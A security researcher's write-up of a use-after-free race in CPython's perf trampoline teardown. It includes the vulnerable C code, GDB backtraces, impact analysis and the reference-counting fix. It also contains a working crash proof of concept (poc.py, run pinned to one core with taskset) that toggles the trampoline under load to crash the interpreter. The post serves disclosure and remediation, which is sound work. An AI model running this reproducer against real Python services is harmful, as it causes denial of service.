Summary
In this post, I detail my discovery of a critical race condition and Use-After-Free (UAF) vulnerability in CPython’s perf_trampoline implementation that causes immediate Segmentation Faults in Python 3.12 and SystemErrors in 3.13+. Through stress testing and GDB analysis, I determined that the crash occurs when sys.deactivate_stack_trampoline() is called concurrently with active bytecode execution. The root cause is the free_code_arenas function, which immediately munmaps executable memory pages without checking whether worker threads are still executing code or unwinding stack frames within those regions. This oversight lets the runtime “pull the rug” out from under running threads: the CPU faults as soon as a thread's instruction pointer, or the unwinder walking its frames, touches memory that was freed milliseconds earlier.
The Discovery: AI-Assisted Bug Hunting
This investigation began when my custom AI source code scanner flagged a suspicious memory management pattern in Python/perf_trampoline.c. The tool identified a hazard where munmap was being called on executable memory regions without sufficient locking mechanisms or reference counting to protect concurrent threads.
The scanner specifically highlighted the free_code_arenas function, noting that it iterates through a global list of memory arenas and frees them instantly. In a multi-threaded environment like Python’s, “instant” deallocation of code that might still be running is a recipe for disaster. Guided by this automated insight, I developed a Proof-of-Concept (PoC) to verify if the runtime was indeed “pulling the rug” out from under active threads.
Vulnerability Details
The vulnerability exists in how CPython handles the teardown of “trampolines”—small snippets of assembly code generated on the fly to help profilers (like Linux perf) map Python code to C stack frames.
The Vulnerable Code
The root cause is in free_code_arenas. When you call sys.deactivate_stack_trampoline(), the interpreter cleans up the memory arenas used for these trampolines.
```c
// Python/perf_trampoline.c
static void
free_code_arenas(void)
{
    code_arena_t *cur = perf_code_arena;
    code_arena_t *prev;
    perf_code_arena = NULL; // 1. Global pointer is cleared
    while (cur) {
        // [CRITICAL VULNERABILITY]
        // The memory is unmapped immediately via a syscall.
        // There is NO check to see if a thread is currently executing
        // code on this page or unwinding through it.
        munmap(cur->start_addr, cur->size);
        prev = cur->prev;
        PyMem_RawFree(cur);
        cur = prev;
    }
}
```
The Execution Path
While that cleanup is running, worker threads are routing execution through py_trampoline_evaluator. This function jumps into the generated assembly code located inside those very arenas.
```c
// Python/perf_trampoline.c
static PyObject *
py_trampoline_evaluator(PyThreadState *ts, _PyInterpreterFrame *frame, int throw)
{
    // ...
    // 'f' is a pointer to the machine code inside the mmap'd arena.
    // The CPU Instruction Pointer (IP) moves into the danger zone here.
    return f(ts, frame, throw, _PyEval_EvalFrameDefault);
}
```
The Race Condition
The crash occurs due to a specific interleaving of events:
- Worker Thread enters a trampoline frame. Its instruction pointer (the program counter, PC) now lies inside the memory region 0x725ab....
- Main Thread calls munmap on that region. The OS kernel removes the page table entries.
- Worker Thread attempts to return or handle an exception. The system unwinder (libgcc) tries to read the stack frame to find the return address.
- CRASH: The CPU raises a page fault because the address 0x725ab... is no longer mapped.
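The interleaving above can be replayed deterministically as a pure-Python analogy. This is only a model, not CPython's code: an anonymous mmap stands in for a trampoline arena, two threading.Event objects force the worker to pause while it is "inside" the region, and the main thread unmaps the region in between. Because Python's mmap object checks its own state, the late access surfaces as a ValueError instead of a SIGSEGV. The names run_interleaving and worker are hypothetical.

```python
import mmap
import threading

PAGE = mmap.PAGESIZE


def run_interleaving():
    """Replay the worker/main interleaving step by step and report the outcome."""
    arena = mmap.mmap(-1, PAGE)          # stand-in for an executable code arena
    arena[:4] = b"\xc3\x90\x90\x90"      # placeholder bytes (x86: ret; nop; nop; nop)
    entered = threading.Event()          # worker is now "inside" the arena
    unmapped = threading.Event()         # main thread has released the arena
    result = {}

    def worker():
        first = arena[0]                 # step 1: worker touches the region
        entered.set()
        unmapped.wait()                  # worker is "preempted" here
        try:
            _ = arena[0]                 # step 3: worker returns through the region
            result["outcome"] = "ok"
        except ValueError:               # Python's safe analogue of the page fault
            result["outcome"] = "fault"
        result["first"] = first

    t = threading.Thread(target=worker)
    t.start()
    entered.wait()
    arena.close()                        # step 2: unconditional unmap, no refcount check
    unmapped.set()
    t.join()
    return result


if __name__ == "__main__":
    print(run_interleaving())            # {'outcome': 'fault', 'first': 195}
```

The model removes the timing luck from the picture: once the unmap is allowed to happen between "enter" and "return", the failure is guaranteed.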
Proof of Concept (PoC)
To confirm the AI’s findings, I wrote a Python script that spawns worker threads performing heavy CPU loops. This keeps the worker threads constantly inside the trampoline execution path while the main thread aggressively toggles the trampoline on and off.
Critical Note: Forcing the Race
Race conditions can be notoriously difficult to reproduce reliably because they depend on exact nanosecond timing. I found that this specific crash is most consistent when the Python process is pinned to a single CPU core.
Running on a single core forces the OS to context-switch rapidly between the “destroyer” thread (doing the munmap) and the “worker” threads (executing the code) on the same physical core. This forced interleaving greatly increases the probability that a worker is preempted exactly while it is standing on the memory page that is about to be pulled.
Reproduction Command: To maximize the crash probability, run the script using taskset on Linux:
```shell
taskset -c 0 python3 poc.py
```
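As an alternative to taskset (not part of the original PoC), a script can pin itself to one CPU with os.sched_setaffinity. A minimal sketch, assuming Linux; pin_to_single_cpu is a hypothetical helper name:

```python
import os


def pin_to_single_cpu(cpu=None):
    """Pin the calling thread to one CPU, similar in effect to `taskset -c <cpu>`.

    Linux-only: returns the new affinity set, or None where the API is missing.
    """
    if not hasattr(os, "sched_setaffinity"):
        return None
    if cpu is None:
        # Pick the lowest CPU we are currently allowed to run on.
        cpu = min(os.sched_getaffinity(0))
    # pid 0 targets the calling thread; threads started afterwards inherit
    # this mask, so call it before spawning any worker threads.
    os.sched_setaffinity(0, {cpu})
    return os.sched_getaffinity(0)
```

In the PoC this would be the first call inside trigger_race(), before the worker threads are started, so that every thread shares the single-core mask.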
The Python Script (poc.py):
```python
import sys
import threading
import os


def heavy_workload():
    # Keep the thread inside the trampoline evaluator
    while True:
        _ = sum(i * i for i in range(500))


def trigger_race():
    print(f"[+] PID: {os.getpid()}")
    # Spawn threads to occupy the evaluator
    for _ in range(8):
        t = threading.Thread(target=heavy_workload, daemon=True)
        t.start()
    while True:
        # The race trigger: Toggle rapidly
        sys.activate_stack_trampoline("perf")
        sys.deactivate_stack_trampoline()


if __name__ == "__main__":
    trigger_race()
```
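Before running the PoC, it can help to confirm that the interpreter supports the perf trampoline at all; otherwise the toggle loop simply fails on its first iteration. A minimal sketch, assuming CPython 3.12+ (where sys.activate_stack_trampoline(), sys.deactivate_stack_trampoline() and sys.is_stack_trampoline_active() exist) and assuming activation raises ValueError on builds or platforms without trampoline support; trampoline_supported is a hypothetical helper name:

```python
import sys


def trampoline_supported():
    """Return True if this interpreter can toggle the perf trampoline."""
    if not hasattr(sys, "activate_stack_trampoline"):
        return False                       # pre-3.12 interpreter
    try:
        sys.activate_stack_trampoline("perf")
    except ValueError:
        return False                       # assumed: backend unavailable in this build
    try:
        return sys.is_stack_trampoline_active()
    finally:
        sys.deactivate_stack_trampoline()  # leave the interpreter as we found it
```

A single activate/deactivate pair on one thread is not the racy pattern; the crash needs other threads executing trampolines at the same time.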
Forensic Analysis (GDB)
Running the PoC resulted in a hard crash. The GDB backtrace shows the Use-After-Free directly.
The Killer (Thread 9): This thread is executing the cleanup. It calls munmap, destroying the memory page.
```text
Thread 9 (Thread 0x725ad0b00b80 (LWP 12791)):
#0 0x0000725ad0125d7b in __GI_munmap () at ../sysdeps/unix/syscall-template.S:117
#1 0x0000725ad071b9f4 in free_code_arenas () at Python/perf_trampoline.c:315
#2 _PyPerfTrampoline_FreeArenas () at Python/perf_trampoline.c:421
```
The Victim (Thread 1): This thread is exiting and trying to unwind the stack. The error message <error: Cannot access memory> confirms the memory it relies on is gone.
```text
Thread 1 (Thread 0x725ace5fd6c0 (LWP 12846) (Exiting)):
#0 x86_64_fallback_frame_state ... at ./md-unwind-support.h:63
pc = 0x725ab661e00a <error: Cannot access memory at address 0x725ab661e00a>
#1 uw_frame_state_for ...
#2 0x0000725ab6c86c8a in _Unwind_ForcedUnwind_Phase2 ...
```
The address 0x725ab661e00a (the Program Counter) points to where the trampoline used to be. Because Thread 9 unmapped it moments earlier, Thread 1 crashes with a SEGFAULT.
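Whether an address such as the victim's pc still belongs to any mapping can also be checked against the process's memory map. On a live Linux process, /proc/<pid>/maps lists every mapping as a hexadecimal start-end range (end exclusive), and GDB's info proc mappings shows the same view. A minimal helper, assuming Linux procfs; is_mapped and MAPS_AVAILABLE are hypothetical names:

```python
import os

MAPS_AVAILABLE = os.path.exists("/proc/self/maps")  # Linux procfs present?


def is_mapped(addr, pid="self"):
    """Return True if `addr` lies inside any mapping of process `pid`."""
    with open(f"/proc/{pid}/maps") as maps:
        for line in maps:
            # Each line starts with "start-end", both hex; `end` is exclusive.
            start_hex, end_hex = line.split(None, 1)[0].split("-")
            if int(start_hex, 16) <= addr < int(end_hex, 16):
                return True
    return False
```

Called with the PID printed by the PoC while the process is still alive, is_mapped(0x725ab661e00a, pid=...) would be expected to return False after the arena is unmapped, unless something else has since been mapped at that address (which is exactly the reuse scenario that makes UAF bugs dangerous).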
Conclusion
This bug highlights the extreme care required when managing executable memory in multi-threaded runtimes. A single unchecked munmap can destabilize the entire interpreter. I reported this issue to the CPython team (Issue #143228), and a fix involving reference counting for the code arenas is currently in progress for Python 3.13 and 3.14.
Potential Impact
While this race condition requires specific timing to trigger, the consequences are severe for any production system using the perf profiler support.
- Python 3.12 (Immediate Crash): In Python 3.12.x, this vulnerability results in an immediate Segmentation Fault (SIGSEGV). If a production application (e.g., a web server or data processing pipeline) toggles profiling on and off, a scheduled task could inadvertently trigger a Denial of Service (DoS) by crashing the interpreter process entirely, and an attacker able to influence when profiling is toggled could do so deliberately.
- Python 3.13 / 3.14 (System Integrity Error): In newer development branches, the runtime detects the memory violation differently, resulting in a SystemError: error return without exception set. While this might occasionally avoid a hard segfault, it indicates internal state corruption. The interpreter is left in an unstable state, likely leading to termination or unpredictable behavior.
- Memory Safety Violation: Fundamentally, this is a Use-After-Free (UAF) vulnerability. While my PoC demonstrates a crash (DoS), UAF bugs are a class of memory safety violations that, under highly specific conditions where the freed memory is reallocated immediately with attacker-controlled data, can sometimes lead to arbitrary code execution.
Patch and Remediation
The root of the issue was the assumption that sys.deactivate_stack_trampoline() could safely unmap memory immediately. The fix, as identified by the CPython core developers following my report, involves introducing Reference Counting to the code arenas.
Instead of unconditionally unmapping the memory when the trampoline is deactivated, the runtime must ensure that no code objects are currently relying on that memory.
The Fix Strategy: Code Object Watchers
The remediation uses CPython’s PyCode_AddWatcher API. This allows the memory manager to track the lifecycle of every code object that uses a trampoline.
- Reference Counting: Each memory arena (page of trampolines) now maintains a reference count.
- Delayed Deallocation: When sys.deactivate_stack_trampoline() is called, the arenas are not munmap’d immediately. Instead, they are marked for deletion.
- Watcher Callbacks: A code watcher monitors the destruction of Python code objects. Only when the last code object using a specific arena is destroyed (decrementing the arena’s refcount to zero) is the munmap syscall executed.
This ensures that as long as a thread could be executing a trampoline (holding a reference to the code object), the physical memory page remains valid.
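The ordering rule behind the fix (mark for deletion on deactivate, unmap only when the last user goes away) can be modelled in a few lines of Python. This is a hypothetical sketch, not the merged CPython patch: CodeArena is an invented class, an anonymous mmap stands in for the executable page, and weakref.finalize substitutes for the C-level PyCode_AddWatcher callback, which is not exposed to Python code. The model is also not thread-safe; a real implementation must synchronize the refcount updates with the unmap.

```python
import mmap
import weakref


class CodeArena:
    """Hypothetical model of a trampoline arena with deferred unmapping."""

    def __init__(self, size=mmap.PAGESIZE):
        self.region = mmap.mmap(-1, size)  # stand-in for the executable page
        self.refcount = 0                  # code objects still using this arena
        self.pending_free = False          # set by deactivate()

    def attach(self, code_obj):
        """Record that `code_obj` uses a trampoline in this arena."""
        self.refcount += 1
        # weakref.finalize plays the role of a code-object watcher:
        # the callback runs when `code_obj` is garbage-collected.
        weakref.finalize(code_obj, self._release)

    def _release(self):
        self.refcount -= 1
        self._maybe_unmap()

    def deactivate(self):
        """Mark the arena for deletion instead of unmapping it immediately."""
        self.pending_free = True
        self._maybe_unmap()

    def _maybe_unmap(self):
        # The only place the page is released: deletion requested AND no users left.
        if self.pending_free and self.refcount == 0 and not self.region.closed:
            self.region.close()
```

Calling deactivate() while an attached object is still alive leaves arena.region open; the page is closed only when the last attached object is collected, which mirrors the guarantee described above.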
Status:
- Python 3.12: Marked as “Won’t Fix” for now, as 3.12 is in security-fix-only mode and the complexity of the backport is high compared to the risk (triggering the bug requires sys.activate_stack_trampoline usage).
- Python 3.13 & 3.14: A patch implementing the reference counting mechanism has been merged (PR #143233).